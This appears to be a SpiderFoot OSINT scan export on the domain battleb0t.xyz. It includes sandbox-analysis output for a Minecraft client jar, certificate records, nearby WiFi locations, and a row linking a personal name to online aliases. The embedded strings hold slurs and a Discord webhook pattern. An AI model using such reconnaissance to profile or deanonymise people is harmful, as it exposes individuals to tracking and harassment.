file: "WHAC3UI2.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WHAC3UI2.txt]- [targetUID: 00000000-00002924]\n Dropped file: "T526XV91.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T526XV91.txt]- [targetUID: 00000000-00002924]\n Dropped file: "ISTMQ8W0.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ISTMQ8W0.txt]- [targetUID: 00000000-00002924]\n Dropped file: "ZUL2DS60.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZUL2DS60.txt]- [targetUID: 00000000-00002924]\n Dropped file: "J5MVWDAV.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J5MVWDAV.txt]- [targetUID: 00000000-00002924]\n Dropped file: "1NYW8Z2Y.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1NYW8Z2Y.txt]- [targetUID: 00000000-00002924]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpwww.borisfx.com" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00002924]\n "quote-bg_1_.png" has type "PNG image data 1190 x 188 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "TarCB08.tmp" has type "data"- Location: [%TEMP%\\TarCB08.tmp]- [targetUID: 00000000-00002924]\n "9FF67FB3141440EED32363089565AE60_33E6263BAF1D93C3B754E2140B85CB43" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\9FF67FB3141440EED32363089565AE60_33E6263BAF1D93C3B754E2140B85CB43]- [targetUID: 00000000-00002924]\n "~DF798C5B654290816F.TMP" has type "data"- Location: [%TEMP%\\~DF798C5B654290816F.TMP]- [targetUID: 00000000-00002884]\n "E573CDF4C6D731D56A665145182FD759_CCBDC18CEF38DE614F9036FAB40737A8" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\E573CDF4C6D731D56A665145182FD759_CCBDC18CEF38DE614F9036FAB40737A8]- [targetUID: 00000000-00002924]\n "font-awesome.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "9FF67FB3141440EED32363089565AE60_397A1C578ED0C3E6ED55E7764B7296D0" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\9FF67FB3141440EED32363089565AE60_397A1C578ED0C3E6ED55E7764B7296D0]- [targetUID: 00000000-00002924]\n "1c8618b326fd558f25ae2e551a4b5a932479c918_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00002924]\n "analytics_1_.htm" has type "UTF-8 Unicode text with no line terminators"- [targetUID: N/A]\n "fb_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "7D6243C18F0F8F9AEC6638DD210F1984_1E795B05019FA2C73B95BDB66E6081E5" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D6243C18F0F8F9AEC6638DD210F1984_1E795B05019FA2C73B95BDB66E6081E5]- [targetUID: 00000000-00002924]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002924]\n "api_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "CustomerLogos_weta_1_.png" has type "PNG image data 2400 | 34.148.97.127 |
| 2023-05-12 02:44:03 | Human Name | No | SpiderFoot UI | 2 | 0 | 0 | 0 | None | Dawid Sulej | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 02:44:13 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | github.com | www.battleb0t.xyz |
| 2023-05-12 03:19:22 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.109.153:443 | 185.199.109.0/24 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | steg (Net ID: 00:01:36:06:3F:F8) | 52.3759, 4.8975 |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01.github.io]
https://www.openphish.com/feed.txt | 01.github.io |
| 2023-05-12 02:49:55 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 1, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'kamiblue-2.04.21-3c581c22b.jar', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-159', u'name': u'Writes log files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1074/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1074.001', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"javaw.exe" writes a file "C:\\hs_err_pid4552.log"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"hs_err_pid4552.log" has type "ASCII text with CRLF line terminators"- Location: [C:\\hs_err_pid4552.log]- [targetUID: 00000000-00004552]\n "cce3fe3b0d8d80bc.timestamp" has type "ASCII text with CRLF line terminators"- Location: [%ALLUSERSPROFILE%\\Oracle\\Java\\.oracle_jre_usage\\cce3fe3b0d8d80bc.timestamp]- [targetUID: 00000000-00004552]'}, {u'category': u'Environment Awareness', u'origin': u'Hybrid Analysis Technology', u'identifier': u'stream-3', u'name': u'Contains ability to query the machine version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1082', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-312', u'attck_id': u'T1082', u'relevance': 1, u'threat_level': 0, u'type': 1, u'description': u'INSTANCE.getVersionsFolder@FolderUtils at cb617139dd424aa668b0102de6fd5feb-20db3'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-169', u'name': u'Found mail related domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed email domain:"assets/minecraft/kamiblue/kamimap.png" [Source: 76315e9082d7feae78e5a979537cb15491e33364ab9be90c74a65e132066521f.bin]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': u'"HTTPS traffic to 185.199.110.153 on port 443"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Connection was make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "#rHehV=Bm.nO"\n Heuristic match: "null cannot be cast to non-null type kotlin.Int"\n Heuristic match: "int, kotlin.Int"\n Heuristic match: "java.lang.Integer, kotlin.Int"\n Pattern match: "https://api.mojang.com/user/profiles/"\n Pattern match: "https://api.mojang.com/users/profiles/minecraft/"\n Pattern match: "https://github.com/cabaletta/baritone/blob/master/USAGE.md"\n Pattern match: "https://www.youtube.com/channel/UCJGCNPEjvsCn0FKw3zso0TA"\n Pattern match: "discord.com/invite"\n Heuristic match: "player.name"\n Pattern match: "https://kamiblue.org/download"\n Pattern match: "https://kamiblue.org/api/v1/downloads.json"\n Heuristic match: "entity.name"\n Pattern match: "https://2bqueue.info/queue"\n Heuristic match: "Cannot connect to 2bqueue.info"\n Heuristic match: "file.name"\n Pattern match: "https://raw.githubusercontent.com/kami-blue/cape-api/capes/capes.json"\n Heuristic match: "it.name"\n Pattern match: "https://github.com/kami-blue"\n Pattern match: "https://kamiblue.org"\n Heuristic match: "kamiblue/modules.md"\n Pattern match: "https://api.github.com/repos/kami-blue/client/contributors"\n Pattern match: "github.com/kami-blue/client/graphs/contributors"\n Pattern match: "https://youtu.be/yPYZpwSpKmA"\n Pattern match: "https://kamiblue.org/backdoored"\n Pattern match: "kamiblue.org/license"\n Heuristic match: "waypoint.name"\n Pattern match: "https://kamiblue.org/discord"\n Pattern match: "https://.*discord(app|)\\\\.com/api/webhooks/\\\\d+/.{68}$"\n Heuristic match: "schematicArg.value.name"\n Heuristic match: "it.id"\n Pattern match: "https://raw.githubusercontent.com/2b2t-Utilities/emojis/master/version.json"\n Pattern match: "https://github.com/2b2t-Utilities/emojis/archive/master.zip"\n Heuristic match: "entry.name"\n Pattern match: "http://bugreport.java.com/bugreport/crash.jsp"\n Pattern match: "www.http.HttpClient.openServer(Ljava/lang/String;I)V+4"\n Pattern match: "www.http.HttpClient.openServer()V+114"\n Pattern match: "www.protocol.https.HttpsClient"\n Pattern match: "www.protocol.https.HttpsClient.New(Ljavax/net/ssl/SSLSocketFactory;Ljava/net/URL;Ljavax/net/ssl/HostnameVerifier;Ljava/net/Proxy;ZILsun/net/www/protocol/http/HttpURLConnection;)Lsun/net/www/http/HttpClient;+355"\n Pattern match: "www.protocol.https.AbstractDelegateHttpsURLConnection.getNewHttpClient(Ljava/net/URL;Ljava/net/Proxy;I)Lsun/net/www/http/HttpClient;+13"\n Pattern match: "www.protocol.http.HttpURLConnection.plainConnect0()V+357"\n Pattern match: "www.protocol.http.HttpURLConnection.plainConnect()V+71"\n Pattern match: "www.protocol.https.AbstractDelegateHttpsURLConnection.connect()V+9"\n Pattern match: "www.protocol.http.HttpURLConnection.getInputStream0()Ljava/io/InputStream;+195"\n Pattern match: "www.protocol.http.HttpURLConnection.getInputStream()Ljava/io/InputStream;+52"\n Pattern match: "www.protocol.https.HttpsURLConnectionImpl.getInputStream()Ljava/io/InputStream;+4"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-98', u'name': u'Possibly tries to communicate over SSL connection (HTTPS)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"https://api.mojang.com/user/profiles/" + UUIDUtils.INSTANCE.removeDashes(uuid) + "/names" (Indicator: "https://")\n "https://api.mojang.com/users/profiles/minecraft/" (Indicator: "https://")\n "Invalid Command! Please view possible commands at https://github.com/cabaletta/baritone/blob/master/USAGE.md" (Indicator: "https://")\n ".+ Download WWE utility mod, Its free!"\n ".+ 4b4t is da best mintscreft serber"\n ".+ dont abouse"\n ".+ you cuck"\n ".+ https://www.youtube.com/channel/UCJGCNPEjvsCn0FKw3zso0TA"\n ".+ is my step dad"\n ".+ again daddy!"\n "dont worry .+ it happens to every one"\n ".+ dont buy future it\'s crap, compared to WWE!"\n "What are you, fucking gay, .+?"\n "Did you know? .+ hates you, .+"\n "You are literally 10, .+"\n ".+ finally lost their virginity, sadly they lost it to .+... yeah, that\'s unfortunate."\n ".+, don\'t be upset, it\'s not like anyone cares about you, fag."\n ".+, see that rubbish bin over there? Get your ass in it, or I\'ll get .+ to whoop your ass."\n ".+, may I borrow that dirt block? that guy named .+ needs it..."\n "Yo, .+, btfo you virgin"\n "Hey .+ want to play some High School RP with me and .+?"\n ".+ is an Archon player. Why is he on here? Fucking factions player."\n "Did you know? .+ just joined The Vortex Coalition!"\n ".+ has successfully conducted the cactus dupe and duped a itemhand!"\n ".+, are you even human? You act like my dog, holy shit."\n ".+, you were never loved by your family."\n "Come on .+, you hurt .+\'s feelings. You meany."\n "Stop trying to meme .+, you can\'t do that. kek"\n ".+, .+ is gay. Don\'t go near him."\n "Whoa .+ didn\'t mean to offend you, .+."\n ".+ im not pvping .+, im WWE\'ing .+."\n "Did you know? .+ just joined The Vortex Coalition!"\n ".+, are you even human? You act like my dog, holy shit." (Indicator: "https://")\n "https://kamiblue.org/download" (Indicator: "https://")\n "https://kamiblue.org/api/v1/downloads.json" (Indicator: "https://")\n "https://2bqueue.info/queue" (Indicator: "https://")\n "https://kamiblue.org/api/v1/downloads.json")\n "\\n"\n "" (Indicator: "https://")\n "https://raw.githubusercontent.com/kami-blue/cape-api/capes/capes.json" (Indicator: "https://")\n "https://github.com/kami-blue" (Indicator: "https://")\n "https://kamiblue.org" (Indicator: "https://")\n "https://api.github.com/repos/kami-blue/client/contributors" (Indicator: "https://")\n "Failed to retrieve contributors from Github API.\\nCheckout the page manually: &9https://github.com/kami-blue/client/graphs/contributors" (Indicator: "https://")\n "https://youtu.be/yPYZpwSpKmA" (Indicator: "https://")\n "https://kamiblue.org/backdoored" (Indicator: "https://")\n "You can view KAMI Blue\'s &7client&f License (LGPLv3) at &9https://kamiblue.org/license" (Indicator: "https://")\n "General FAQ:\\nHow do I see all commands? - " + TextFormattingKt.formatValue(HelpCommand.access$getCompanion$p$s-2125338400().getPrefix() + INSTANCE.getName() + " commands") + "\\nHow do I use Baritone? - " + TextFormattingKt.formatVal | 185.199.110.153 |
| 2023-05-12 02:50:31 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:3a:9d:01:de:8f:db:a2:52:4a:02:0c:18:70:da:44:dd:bc
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:50:47 2023 GMT
Not After : Jun 11 12:50:46 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:86:d1:c6:73:d4:68:16:b7:b8:27:02:2e:0a:
3b:ac:b2:c0:cf:5d:bb:e0:97:62:4b:2d:4c:a7:8a:
0f:bb:28:62:25:f7:8b:c2:a2:9f:9f:a4:09:ae:64:
46:ad:01:04:9a:1c:e2:d3:da:ff:2f:0b:66:3e:17:
93:38:08:7c:21:35:76:62:9b:3d:79:67:17:13:fe:
36:e3:cb:d3:f1:13:27:de:39:d4:be:26:b9:a7:bc:
48:6c:32:02:59:5e:42:77:18:cd:f0:52:6e:ff:59:
03:7e:1d:11:be:bc:ab:d2:7f:d2:95:33:32:9e:74:
fe:3f:8c:4e:e3:30:bd:bb:06:89:38:c8:e8:4f:53:
3b:f6:63:c0:62:08:06:0e:e7:94:7f:f0:60:db:70:
ea:7f:78:d5:b9:6c:e0:49:a6:b4:37:75:b0:52:59:
b3:35:96:ab:99:46:f4:69:22:fd:0c:96:69:7a:42:
ab:47:42:08:6b:5e:8a:9a:4d:97:23:10:94:f7:79:
b4:c3:5e:97:52:71:2a:e0:cb:16:4d:05:9d:0a:4b:
32:05:28:18:33:7b:d6:34:6c:b7:3e:5b:ab:cb:54:
41:54:0f:0b:fa:c3:ea:b8:4b:80:0a:8e:f0:90:cd:
32:45:6e:24:6b:2b:da:60:08:2e:69:e6:59:89:a4:
25:87:82:03:c6:3c:bd:7c:46:55:91:56:df:8c:10:
3f:c4:bc:32:26:aa:2e:b1:d8:86:87:bf:32:be:e7:
49:d8:74:e0:99:42:34:64:c2:23:25:06:06:47:62:
f1:32:ce:42:2e:0b:a1:5c:5c:7d:55:6f:f5:43:b6:
4a:13:84:0e:20:9b:ad:e4:75:cf:98:ec:28:ca:d5:
97:e8:15:83:85:e3:c5:d8:e3:28:87:31:07:5e:2c:
11:d9:8a:d6:52:d3:ed:87:7d:ab:aa:dd:63:d0:48:
bb:c8:d0:2e:7e:92:84:13:37:53:61:b8:ec:ac:9a:
86:7b:ce:3f:d2:40:f0:db:6c:2c:1e:97:3b:c5:cb:
35:b4:86:6e:2c:94:d1:aa:dc:d2:87:31:ab:38:c5:
f4:27:1d:0a:25:44:99:80:36:03:ce:91:80:1c:d1:
59:d4:7c:5a:37:1b:0a:ce:f5:f1:c0:65:43:fc:ee:
ed:8e:bc:b1:d6:9d:85:ca:8e:38:b3:e3:c0:7f:97:
a5:98:eb:15:ff:cd:24:e7:6d:15:4d:57:89:17:a7:
5f:b4:d5:d3:b7:8f:07:9c:a8:ea:76:1e:e7:f3:2c:
9b:59:ae:2b:2b:2c:ad:9d:e2:f1:8d:94:c2:23:8f:
a7:4d:67:84:e7:2f:fb:e0:0a:d2:eb:7c:d9:ee:92:
a6:63:7b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
20:59:35:73:F8:CD:0E:84:44:DD:6F:B0:C2:B9:45:18:98:00:40:7B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 13 13:50:48.097 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:CF:17:8C:E7:5C:85:D2:35:C0:73:1C:
DD:DC:CB:6A:69:22:6C:11:CA:4A:7A:70:E6:41:98:64:
C2:D6:EB:16:05:02:21:00:BB:55:01:DF:9D:AA:0D:1D:
85:02:D9:76:FB:4F:6B:D6:D8:8F:94:82:00:A7:D0:65:
5A:13:BE:6C:BF:BD:5B:9D
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Mar 13 13:50:48.131 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:AF:43:46:DF:38:C8:21:CA:47:16:D3:
84:F0:B4:A9:1B:09:0F:BB:55:58:89:44:1F:3A:9E:8A:
3C:22:70:0D:03:02:21:00:8B:39:10:8E:8A:36:DF:3F:
E7:32:3D:76:7C:AB:60:E8:18:70:D5:6D:0E:33:7A:97:
F4:0A:88:2E:3A:2E:C4:71
Signature Algorithm: sha256WithRSAEncryption
7c:6a:76:1d:db:1c:de:c2:19:6d:98:57:99:25:b4:5e:0f:bf:
95:8c:45:a2:25:ed:32:95:f2:0a:78:4e:ff:62:f4:67:48:31:
90:2b:e2:3c:d5:1d:db:e1:60:6a:0f:17:23:34:71:35:8b:95:
4d:73:cd:e3:a3:52:97:93:84:37:a2:ed:c5:7c:91:2b:0a:f9:
83:c1:eb:81:7e:88:34:cd:f0:88:f8:df:18:16:ef:ca:7e:49:
f2:a7:b7:0e:a3:4b:4e:4f:92:f3:51:0f:2b:4e:c0:52:1c:18:
2a:c7:b7:9d:09:65:0e:50:64:7a:7d:02:f3:86:ed:28:2c:cd:
4a:55:5f:32:f3:f6:3f:13:34:34:14:d8:2b:1d:6d:73:a0:41:
90:ec:31:52:17:e6:2f:8b:58:c6:fb:86:38:bb:08:6b:2a:fc:
64:0a:2b:2e:0f:f6:06:a5:76:85:8b:81:7c:0b:e7:7d:41:98:
29:67:65:9c:a3:5e:54:d7:42:a2:ca:57:e3:ed:40:b5:6b:e7:
20:ae:3b:11:70:76:c2:da:cf:31:f0:ab:ca:10:28:73:4e:36:
4a:79:71:99:ba:fe:41:29:e0:de:27:f3:42:87:08:d7:24:fe:
2c:3e:d4:01:c9:17:cd:e7:bc:a6:c4:72:63:d4:a6:ab:14:ea:
33:96:20:50
| battleb0t.xyz |
| 2023-05-12 03:01:08 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.118): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Av.AliBerksun (Net ID: 00:18:4D:47:67:DA) | 40.2024, 29.0398 |
| 2023-05-12 02:44:31 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:56:b0:2c:f1:37:ec:4d:fb:ba:29:5b:fe:cf:08:f7:c5:d3
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:49:55 2023 GMT
Not After : Apr 27 17:49:54 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:cb:71:f4:b8:7c:a4:30:09:1b:13:75:c6:c3:49:
0a:5a:97:35:c2:e3:b5:90:5b:a3:b9:e0:c8:a4:e3:
37:7a:a6:7e:1b:38:a5:5a:63:ab:b5:eb:db:f5:ce:
46:28:9a:bb:61:30:d2:f6:61:59:c2:0e:37:b3:85:
32:eb:67:93:5c:a2:8a:68:ae:c7:6a:b0:d0:9f:fc:
8d:d5:3b:0a:5d:17:21:49:98:a5:cc:cd:89:42:87:
4d:54:69:c0:91:34:ff:12:c3:4c:10:fb:89:47:3a:
b3:b5:ed:cc:06:52:eb:16:7a:af:b4:c5:22:00:43:
aa:8d:8b:68:61:04:b5:6e:86:7d:6f:23:6e:79:15:
3b:96:1c:92:ea:d1:76:1a:98:eb:67:69:53:a7:00:
db:63:83:56:0b:fc:db:8c:00:6a:64:27:99:81:0c:
e0:c2:14:78:8e:45:d2:05:23:4b:2e:a1:d6:90:83:
3d:eb:f6:16:04:b9:30:78:89:df:df:c5:c0:a5:c5:
60:dc:2c:82:50:e1:50:fc:88:d4:46:2d:16:9d:dd:
14:56:c3:31:55:0c:b7:cc:40:45:d8:f9:22:11:f9:
ed:60:df:5c:2f:a8:5f:17:ac:ff:7d:8a:1e:77:a6:
e8:15:cb:e0:33:32:29:69:ca:42:d7:15:49:3f:d9:
68:31:ef:59:a1:4e:f5:94:c3:75:47:24:20:25:4f:
22:0f:35:ad:2a:db:20:f0:5d:b9:c7:a2:17:d1:f3:
52:80:77:94:64:66:0d:72:a2:bf:aa:b0:5e:b6:d9:
af:81:4d:54:fa:3e:6b:7d:a8:7b:0d:08:23:70:3b:
37:ad:2b:75:bf:91:06:70:7f:c1:79:93:83:08:8c:
9a:bf:f2:64:ef:2f:39:42:b9:84:35:4b:b0:83:66:
5e:d7:c5:a7:06:f4:b4:89:e9:41:d1:09:1f:c3:66:
18:da:ea:4b:2f:9a:1a:d0:a2:05:8c:af:7f:ec:ae:
0f:17:00:fd:78:c7:64:b6:db:0c:73:e7:03:66:b3:
9e:9f:74:ea:0a:b7:ba:41:3e:89:fa:49:d9:69:26:
3c:0e:bc:77:f5:9f:cd:1d:0b:77:59:ba:57:e5:96:
24:24:9a:52:56:4e:63:31:d7:70:db:dc:4b:70:cb:
90:cd:e2:20:14:b5:fa:25:1b:2d:3b:39:de:26:c5:
3e:2d:95:63:5f:d6:2a:ba:87:f1:7a:9d:cc:8d:4d:
e8:02:34:63:08:c3:8a:65:36:2f:3d:9b:90:77:71:
2a:cc:26:26:c5:ad:9e:d8:4e:fb:7a:b2:ec:5f:c7:
b5:9a:b3:86:c9:5c:88:b7:8c:c8:3d:30:64:42:7f:
87:9a:b5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:A0:A8:B9:3F:90:D7:08:DA:7E:1F:47:83:D5:88:5D:68:C9:9D:69
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 27 18:49:55.813 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:86:06:13:D6:59:74:98:67:AB:1E:5E:
35:81:72:04:C0:6A:1F:FC:7B:00:6F:B8:03:F1:BE:1B:
95:AB:B8:28:27:02:21:00:BC:93:E5:D5:C0:AB:C3:D9:
F0:70:98:2F:0B:66:FF:CE:EB:B1:93:B5:AF:E3:EC:E5:
24:C0:E0:01:07:FE:3F:C0
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Jan 27 18:49:55.791 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:EE:AA:37:8F:C9:30:00:92:D7:56:A4:
B6:CE:F3:F5:CF:29:81:16:83:11:DE:9E:A3:05:67:53:
91:6D:18:E7:A8:02:21:00:D8:7E:2B:BA:15:47:72:19:
DF:D8:EF:24:B0:25:79:A1:48:F8:3A:2F:C8:FB:0A:50:
3F:7F:81:1E:4F:CF:9B:26
Signature Algorithm: sha256WithRSAEncryption
54:17:5d:50:fa:47:51:89:f1:3d:5a:36:e8:d7:6e:d8:ae:85:
fe:d5:2e:dc:14:36:b2:f3:63:e0:57:da:ee:7f:c4:31:c7:24:
a6:e1:02:c4:6d:d7:20:80:18:28:5b:5e:4a:05:31:14:72:9e:
66:88:fd:41:57:c0:d0:ff:22:13:fd:7e:a3:d9:75:17:b4:67:
19:9a:e9:16:5e:44:4f:78:33:3a:4e:54:5f:6f:68:3b:1c:af:
d6:db:9b:bd:2a:b2:ea:76:7b:55:8a:a5:42:70:bd:16:d6:9e:
36:d7:56:22:2c:f3:d5:18:19:3e:f8:18:e5:da:a9:4e:03:a9:
13:d9:fb:8a:01:6e:70:f3:d9:fb:a9:8f:9a:38:b9:d7:89:2c:
9a:59:0a:bf:e9:71:d6:1c:2b:eb:93:fd:5b:0d:32:8d:ce:21:
6b:4e:a0:7b:68:bb:1b:49:02:64:07:cd:71:b7:fa:23:e8:c5:
12:86:a7:7c:6b:b8:cf:88:07:9a:b1:b0:e7:e8:80:0a:54:1c:
15:61:1e:50:90:fa:7e:93:82:0d:40:bf:16:d5:1e:1e:93:9f:
58:6f:56:5d:6c:49:c2:36:9e:81:7f:0e:32:d4:68:dd:6c:03:
64:48:28:01:66:a7:85:1f:9a:be:92:2f:5f:75:fe:d1:ff:94:
e2:b4:07:7b
| battleb0t.xyz |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=kekw.battleb0t.xyz | battleb0t.xyz |
